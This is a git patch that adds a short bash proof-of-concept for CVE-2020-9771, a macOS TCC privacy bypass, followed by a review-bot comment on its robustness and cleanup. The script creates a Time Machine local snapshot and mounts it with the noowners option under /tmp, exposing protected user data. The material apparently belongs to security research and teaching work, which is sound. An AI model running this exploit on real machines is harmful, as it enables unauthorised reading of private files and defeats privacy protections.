From b2c21cd37ddc724d44b58478c27c0a6efb528f8a Mon Sep 17 00:00:00 2001
From: Karmaz95
Date: Mon, 11 Nov 2024 21:45:45 +0100
Subject: [PATCH] Adding PoC for CVE-2020-9771 TCC Bypass for FDA Terminal exploitation
---
 IX. TCC/custom/FDA_mount_apfs.sh | 19 +++++++++++++++++++
 1 file changed, 19 insertions(+)
 create mode 100644 IX. TCC/custom/FDA_mount_apfs.sh
diff --git a/IX. TCC/custom/FDA_mount_apfs.sh b/IX. TCC/custom/FDA_mount_apfs.sh
new file mode 100644
index 0000000..368c395
--- /dev/null
+++ b/IX. TCC/custom/FDA_mount_apfs.sh
@@ -0,0 +1,19 @@
+#!/bin/bash
+# PoC: CVE-2020-9771 TCC Bypass – It was patched by TCC Full Disk Access (FDA).
+# Still, Terminal with FDA can read the contents of the whole system.
+# https://theevilbit.github.io/posts/cve_2020_9771/
+
+# Create a new local snapshot
+tmutil localsnapshot
+
+# Automatically retrieve the latest snapshot ID
+SNAPSHOT_ID=$(tmutil listlocalsnapshots / | grep 'com.apple.TimeMachine' | tail -n 1 | awk '{print $NF}')
+
+# Define the mount point (create if it doesn't exist)
+MOUNT_DIR="/tmp/POC"
+mkdir -p "$MOUNT_DIR"
+
+# Mount the latest snapshot with noowners option
+/sbin/mount_apfs -o noowners -s "$SNAPSHOT_ID" /System/Volumes/Data "$MOUNT_DIR"
+
+echo "Snapshot mounted at $MOUNT_DIR"
\ No newline at end of file
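Review bot: `SNAPSHOT_ID` is never checked, so if `tmutil localsnapshot` fails or the `listlocalsnapshots | grep | tail | awk` pipeline yields nothing, the script still runs `mount_apfs -s ""` against `/System/Volumes/Data` and then prints "Snapshot mounted" regardless of the mount's exit status; add `set -euo pipefail` after the shebang and `[[ -n "$SNAPSHOT_ID" ]] || { printf 'no local snapshot found\n' >&2; exit 1; }` before the mount line. `MOUNT_DIR="/tmp/POC"` is a fixed path in a world-writable directory, so `mkdir -p` silently reuses whatever already exists there; `MOUNT_DIR=$(mktemp -d)` avoids that. The script also leaves both the new local snapshot and the mount in place, which the header comment should state along with how to undo them (`umount "$MOUNT_DIR"` and `tmutil deletelocalsnapshots`), since a forgotten mounted snapshot under `/tmp` is an easy thing to miss during cleanup. The hunk does not show which privileges or TCC grants the mount needs on current macOS beyond the FDA remark in the header, so that precondition should be documented explicitly rather than left to the reader.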